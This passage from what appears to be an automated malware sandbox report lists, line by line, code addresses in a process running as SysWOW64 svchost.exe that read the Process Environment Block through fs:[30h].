                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038DE10E mov ecx, dword ptr fs:[00000030h]8_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038DE10E mov eax, dword ptr fs:[00000030h]8_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038DE10E mov eax, dword ptr fs:[00000030h]8_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038DE10E mov ecx, dword ptr fs:[00000030h]8_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038DE10E mov eax, dword ptr fs:[00000030h]8_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038DE10E mov ecx, dword ptr fs:[00000030h]8_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038DA118 mov ecx, dword ptr fs:[00000030h]8_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038DA118 mov eax, dword ptr fs:[00000030h]8_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038DA118 mov eax, dword ptr fs:[00000030h]8_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038DA118 mov eax, dword ptr fs:[00000030h]8_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038F0115 mov eax, dword ptr fs:[00000030h]8_2_038F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03860124 mov eax, dword ptr fs:[00000030h]8_2_03860124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038C4144 mov eax, dword ptr fs:[00000030h]8_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038C4144 mov eax, dword ptr fs:[00000030h]8_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038C4144 mov ecx, dword ptr fs:[00000030h]8_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038C4144 mov eax, dword ptr fs:[00000030h]8_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038C4144 mov eax, dword ptr fs:[00000030h]8_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0382C156 mov eax, dword ptr fs:[00000030h]8_2_0382C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038C8158 mov eax, dword ptr fs:[00000030h]8_2_038C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03836154 mov eax, dword ptr fs:[00000030h]8_2_03836154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03836154 mov eax, dword ptr fs:[00000030h]8_2_03836154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03904164 mov eax, dword ptr fs:[00000030h]8_2_03904164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03904164 mov eax, dword ptr fs:[00000030h]8_2_03904164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383208A mov eax, dword ptr fs:[00000030h]8_2_0383208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038280A0 mov eax, dword ptr fs:[00000030h]8_2_038280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038C80A8 mov eax, dword ptr fs:[00000030h]8_2_038C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038F60B8 mov eax, dword ptr fs:[00000030h]8_2_038F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038F60B8 mov ecx, dword ptr fs:[00000030h]8_2_038F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B20DE mov eax, dword ptr fs:[00000030h]8_2_038B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0382A0E3 mov ecx, dword ptr fs:[00000030h]8_2_0382A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038380E9 mov eax, dword ptr fs:[00000030h]8_2_038380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B60E0 mov eax, dword ptr fs:[00000030h]8_2_038B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0382C0F0 mov eax, dword ptr fs:[00000030h]8_2_0382C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038720F0 mov ecx, dword ptr fs:[00000030h]8_2_038720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B4000 mov ecx, dword ptr fs:[00000030h]8_2_038B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038D2000 mov eax, dword ptr fs:[00000030h]8_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038D2000 mov eax, dword ptr fs:[00000030h]8_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038D2000 mov eax, dword ptr fs:[00000030h]8_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038D2000 mov eax, dword ptr fs:[00000030h]8_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038D2000 mov eax, dword ptr fs:[00000030h]8_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038D2000 mov eax, dword ptr fs:[00000030h]8_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038D2000 mov eax, dword ptr fs:[00000030h]8_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038D2000 mov eax, dword ptr fs:[00000030h]8_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384E016 mov eax, dword ptr fs:[00000030h]8_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384E016 mov eax, dword ptr fs:[00000030h]8_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384E016 mov eax, dword ptr fs:[00000030h]8_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384E016 mov eax, dword ptr fs:[00000030h]8_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0382A020 mov eax, dword ptr fs:[00000030h]8_2_0382A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0382C020 mov eax, dword ptr fs:[00000030h]8_2_0382C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038C6030 mov eax, dword ptr fs:[00000030h]8_2_038C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03832050 mov eax, dword ptr fs:[00000030h]8_2_03832050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B6050 mov eax, dword ptr fs:[00000030h]8_2_038B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385C073 mov eax, dword ptr fs:[00000030h]8_2_0385C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038D678E mov eax, dword ptr fs:[00000030h]8_2_038D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038307AF mov eax, dword ptr fs:[00000030h]8_2_038307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038E47A0 mov eax, dword ptr fs:[00000030h]8_2_038E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383C7C0 mov eax, dword ptr fs:[00000030h]8_2_0383C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B07C3 mov eax, dword ptr fs:[00000030h]8_2_038B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038527ED mov eax, dword ptr fs:[00000030h]8_2_038527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038527ED mov eax, dword ptr fs:[00000030h]8_2_038527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038527ED mov eax, dword ptr fs:[00000030h]8_2_038527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038BE7E1 mov eax, dword ptr fs:[00000030h]8_2_038BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038347FB mov eax, dword ptr fs:[00000030h]8_2_038347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038347FB mov eax, dword ptr fs:[00000030h]8_2_038347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386C700 mov eax, dword ptr fs:[00000030h]8_2_0386C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03830710 mov eax, dword ptr fs:[00000030h]8_2_03830710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03860710 mov eax, dword ptr fs:[00000030h]8_2_03860710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386C720 mov eax, dword ptr fs:[00000030h]8_2_0386C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386C720 mov eax, dword ptr fs:[00000030h]8_2_0386C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386273C mov eax, dword ptr fs:[00000030h]8_2_0386273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386273C mov ecx, dword ptr fs:[00000030h]8_2_0386273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386273C mov eax, dword ptr fs:[00000030h]8_2_0386273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038AC730 mov eax, dword ptr fs:[00000030h]8_2_038AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386674D mov esi, dword ptr fs:[00000030h]8_2_0386674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386674D mov eax, dword ptr fs:[00000030h]8_2_0386674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386674D mov eax, dword ptr fs:[00000030h]8_2_0386674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03830750 mov eax, dword ptr fs:[00000030h]8_2_03830750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038BE75D mov eax, dword ptr fs:[00000030h]8_2_038BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872750 mov eax, dword ptr fs:[00000030h]8_2_03872750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872750 mov eax, dword ptr fs:[00000030h]8_2_03872750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B4755 mov eax, dword ptr fs:[00000030h]8_2_038B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03838770 mov eax, dword ptr fs:[00000030h]8_2_03838770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840770 mov eax, dword ptr fs:[00000030h]8_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840770 mov eax, dword ptr fs:[00000030h]8_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840770 mov eax, dword ptr fs:[00000030h]8_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840770 mov eax, dword ptr fs:[00000030h]8_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840770 mov eax, dword ptr fs:[00000030h]8_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840770 mov eax, dword ptr fs:[00000030h]8_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840770 mov eax, dword ptr fs:[00000030h]8_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840770 mov eax, dword ptr fs:[00000030h]8_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840770 mov eax, dword ptr fs:[00000030h]8_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840770 mov eax, dword ptr fs:[00000030h]8_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840770 mov eax, dword ptr fs:[00000030h]8_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840770 mov eax, dword ptr fs:[00000030h]8_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03834690 mov eax, dword ptr fs:[00000030h]8_2_03834690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03834690 mov eax, dword ptr fs:[00000030h]8_2_03834690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386C6A6 mov eax, dword ptr fs:[00000030h]8_2_0386C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038666B0 mov eax, dword ptr fs:[00000030h]8_2_038666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386A6C7 mov ebx, dword ptr fs:[00000030h]8_2_0386A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386A6C7 mov eax, dword ptr fs:[00000030h]8_2_0386A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038AE6F2 mov eax, dword ptr fs:[00000030h]8_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038AE6F2 mov eax, dword ptr fs:[00000030h]8_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038AE6F2 mov eax, dword ptr fs:[00000030h]8_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038AE6F2 mov eax, dword ptr fs:[00000030h]8_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B06F1 mov eax, dword ptr fs:[00000030h]8_2_038B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B06F1 mov eax, dword ptr fs:[00000030h]8_2_038B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038AE609 mov eax, dword ptr fs:[00000030h]8_2_038AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384260B mov eax, dword ptr fs:[00000030h]8_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384260B mov eax, dword ptr fs:[00000030h]8_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384260B mov eax, dword ptr fs:[00000030h]8_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384260B mov eax, dword ptr fs:[00000030h]8_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384260B mov eax, dword ptr fs:[00000030h]8_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384260B mov eax, dword ptr fs:[00000030h]8_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384260B mov eax, dword ptr fs:[00000030h]8_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872619 mov eax, dword ptr fs:[00000030h]8_2_03872619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384E627 mov eax, dword ptr fs:[00000030h]8_2_0384E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03866620 mov eax, dword ptr fs:[00000030h]8_2_03866620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03868620 mov eax, dword ptr fs:[00000030h]8_2_03868620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383262C mov eax, dword ptr fs:[00000030h]8_2_0383262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384C640 mov eax, dword ptr fs:[00000030h]8_2_0384C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038F866E mov eax, dword ptr fs:[00000030h]8_2_038F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038F866E mov eax, dword ptr fs:[00000030h]8_2_038F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386A660 mov eax, dword ptr fs:[00000030h]8_2_0386A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386A660 mov eax, dword ptr fs:[00000030h]8_2_0386A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03862674 mov eax, dword ptr fs:[00000030h]8_2_03862674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03832582 mov eax, dword ptr fs:[00000030h]8_2_03832582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03832582 mov ecx, dword ptr fs:[00000030h]8_2_03832582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03864588 mov eax, dword ptr fs:[00000030h]8_2_03864588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386E59C mov eax, dword ptr fs:[00000030h]8_2_0386E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B05A7 mov eax, dword ptr fs:[00000030h]8_2_038B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B05A7 mov eax, dword ptr fs:[00000030h]8_2_038B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B05A7 mov eax, dword ptr fs:[00000030h]8_2_038B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038545B1 mov eax, dword ptr fs:[00000030h]8_2_038545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038545B1 mov eax, dword ptr fs:[00000030h]8_2_038545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386E5CF mov eax, dword ptr fs:[00000030h]8_2_0386E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386E5CF mov eax, dword ptr fs:[00000030h]8_2_0386E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038365D0 mov eax, dword ptr fs:[00000030h]8_2_038365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386A5D0 mov eax, dword ptr fs:[00000030h]8_2_0386A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386A5D0 mov eax, dword ptr fs:[00000030h]8_2_0386A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385E5E7 mov eax, dword ptr fs:[00000030h]8_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385E5E7 mov eax, dword ptr fs:[00000030h]8_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385E5E7 mov eax, dword ptr fs:[00000030h]8_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385E5E7 mov eax, dword ptr fs:[00000030h]8_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385E5E7 mov eax, dword ptr fs:[00000030h]8_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385E5E7 mov eax, dword ptr fs:[00000030h]8_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385E5E7 mov eax, dword ptr fs:[00000030h]8_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385E5E7 mov eax, dword ptr fs:[00000030h]8_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038325E0 mov eax, dword ptr fs:[00000030h]8_2_038325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386C5ED mov eax, dword ptr fs:[00000030h]8_2_0386C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386C5ED mov eax, dword ptr fs:[00000030h]8_2_0386C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038C6500 mov eax, dword ptr fs:[00000030h]8_2_038C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03904500 mov eax, dword ptr fs:[00000030h]8_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03904500 mov eax, dword ptr fs:[00000030h]8_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03904500 mov eax, dword ptr fs:[00000030h]8_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03904500 mov eax, dword ptr fs:[00000030h]8_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03904500 mov eax, dword ptr fs:[00000030h]8_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03904500 mov eax, dword ptr fs:[00000030h]8_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03904500 mov eax, dword ptr fs:[00000030h]8_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840535 mov eax, dword ptr fs:[00000030h]8_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840535 mov eax, dword ptr fs:[00000030h]8_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840535 mov eax, dword ptr fs:[00000030h]8_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840535 mov eax, dword ptr fs:[00000030h]8_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840535 mov eax, dword ptr fs:[00000030h]8_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840535 mov eax, dword ptr fs:[00000030h]8_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385E53E mov eax, dword ptr fs:[00000030h]8_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385E53E mov eax, dword ptr fs:[00000030h]8_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385E53E mov eax, dword ptr fs:[00000030h]8_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385E53E mov eax, dword ptr fs:[00000030h]8_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385E53E mov eax, dword ptr fs:[00000030h]8_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03838550 mov eax, dword ptr fs:[00000030h]8_2_03838550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03838550 mov eax, dword ptr fs:[00000030h]8_2_03838550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386656A mov eax, dword ptr fs:[00000030h]8_2_0386656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386656A mov eax, dword ptr fs:[00000030h]8_2_0386656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386656A mov eax, dword ptr fs:[00000030h]8_2_0386656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038EA49A mov eax, dword ptr fs:[00000030h]8_2_038EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038364AB mov eax, dword ptr fs:[00000030h]8_2_038364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038644B0 mov ecx, dword ptr fs:[00000030h]8_2_038644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038BA4B0 mov eax, dword ptr fs:[00000030h]8_2_038BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038304E5 mov ecx, dword ptr fs:[00000030h]8_2_038304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03868402 mov eax, dword ptr fs:[00000030h]8_2_03868402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03868402 mov eax, dword ptr fs:[00000030h]8_2_03868402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03868402 mov eax, dword ptr fs:[00000030h]8_2_03868402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0382E420 mov eax, dword ptr fs:[00000030h]8_2_0382E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0382E420 mov eax, dword ptr fs:[00000030h]8_2_0382E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0382E420 mov eax, dword ptr fs:[00000030h]8_2_0382E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0382C427 mov eax, dword ptr fs:[00000030h]8_2_0382C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B6420 mov eax, dword ptr fs:[00000030h]8_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B6420 mov eax, dword ptr fs:[00000030h]8_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B6420 mov eax, dword ptr fs:[00000030h]8_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B6420 mov eax, dword ptr fs:[00000030h]8_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B6420 mov eax, dword ptr fs:[00000030h]8_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B6420 mov eax, dword ptr fs:[00000030h]8_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B6420 mov eax, dword ptr fs:[00000030h]8_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386A430 mov eax, dword ptr fs:[00000030h]8_2_0386A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386E443 mov eax, dword ptr fs:[00000030h]8_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386E443 mov eax, dword ptr fs:[00000030h]8_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386E443 mov eax, dword ptr fs:[00000030h]8_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386E443 mov eax, dword ptr fs:[00000030h]8_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386E443 mov eax, dword ptr fs:[00000030h]8_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386E443 mov eax, dword ptr fs:[00000030h]8_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386E443 mov eax, dword ptr fs:[00000030h]8_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386E443 mov eax, dword ptr fs:[00000030h]8_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038EA456 mov eax, dword ptr fs:[00000030h]8_2_038EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0382645D mov eax, dword ptr fs:[00000030h]8_2_0382645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385245A mov eax, dword ptr fs:[00000030h]8_2_0385245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038BC460 mov ecx, dword ptr fs:[00000030h]8_2_038BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385A470 mov eax, dword ptr fs:[00000030h]8_2_0385A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385A470 mov eax, dword ptr fs:[00000030h]8_2_0385A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385A470 mov eax, dword ptr fs:[00000030h]8_2_0385A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840BBE mov eax, dword ptr fs:[00000030h]8_2_03840BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840BBE mov eax, dword ptr fs:[00000030h]8_2_03840BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038E4BB0 mov eax, dword ptr fs:[00000030h]8_2_038E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038E4BB0 mov eax, dword ptr fs:[00000030h]8_2_038E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03850BCB mov eax, dword ptr fs:[00000030h]8_2_03850BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03850BCB mov eax, dword ptr fs:[00000030h]8_2_03850BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03850BCB mov eax, dword ptr fs:[00000030h]8_2_03850BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03830BCD mov eax, dword ptr fs:[00000030h]8_2_03830BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03830BCD mov eax, dword ptr fs:[00000030h]8_2_03830BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03830BCD mov eax, dword ptr fs:[00000030h]8_2_03830BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038DEBD0 mov eax, dword ptr fs:[00000030h]8_2_038DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03838BF0 mov eax, dword ptr fs:[00000030h]8_2_03838BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03838BF0 mov eax, dword ptr fs:[00000030h]8_2_03838BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03838BF0 mov eax, dword ptr fs:[00000030h]8_2_03838BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385EBFC mov eax, dword ptr fs:[00000030h]8_2_0385EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038BCBF0 mov eax, dword ptr fs:[00000030h]8_2_038BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03904B00 mov eax, dword ptr fs:[00000030h]8_2_03904B00
